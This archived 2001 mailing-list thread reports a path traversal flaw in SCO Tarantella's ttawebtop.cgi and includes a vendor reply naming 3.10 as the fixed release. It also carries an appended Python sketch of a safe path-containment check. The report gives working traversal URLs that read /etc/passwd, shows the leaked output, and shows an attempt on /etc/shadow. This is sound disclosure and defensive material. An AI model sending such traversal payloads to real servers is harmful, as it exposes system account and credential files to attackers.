On Monday June 18, KF wrote:
> SCO has been notified of this issue.
>
>
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslashat_private>
> To: reconat_private
>
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
>
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
>
>
> No perms to shadow...
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
>
>
> File missing
>
> The following file could not be found:
>
>
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
>
> Please give this information to a Tarantella Administrator.
>
> -KF

This problem was introduced in release 3.01 and was caught during a security audit and was fixed for our last release (Tarantella 3.10). It is a problem for releases 3.00 and 3.01 only. To fix this problem upgrade to 3.10. Thank you for reporting this problem.

- Mike McEwen
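
Added example, not part of the original messages and not Tarantella code: the "File missing" output above shows the pg value appended to /tarantella/ without canonicalisation, and this Python sketch contrasts that with a containment check a CGI handler could apply. The document root and the function names are assumptions made for illustration.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Assumed document root: the error message on the page only shows that
# "/tarantella/" is prefixed to the pg value.
DOC_ROOT = "/tarantella"

# Request quoted in the report above (host is the page's own placeholder).
REPORTED_URL = ("http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg="
                "../../../../../../../../../../../../../../../etc/passwd")


def pg_from_url(url):
    """Return the percent-decoded pg parameter, or None if absent."""
    values = parse_qs(urlsplit(url).query).get("pg", [])
    return values[0] if values else None


def naive_resolve(pg, root=DOC_ROOT):
    """Plain concatenation, the behaviour the error message implies."""
    return root + "/" + pg


def safe_resolve(pg, root=DOC_ROOT):
    """Return the canonical path for pg, or None if it escapes root."""
    if pg is None or "\x00" in pg or os.path.isabs(pg):
        return None
    root_real = os.path.realpath(root)
    # realpath collapses ".." segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(root_real, pg))
    # commonpath compares whole components, so a sibling directory such as
    # /tarantella-old is not accepted as being inside /tarantella.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    pg = pg_from_url(REPORTED_URL)
    print("naive:", naive_resolve(pg))
    print("safe :", safe_resolve(pg))
```

The check runs on the decoded parameter, so percent-encoded dot segments are canonicalised the same way as literal ones.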
This archive was generated by hypermail 2b30 : Tue Jun 19 2001 - 13:10:40 PDT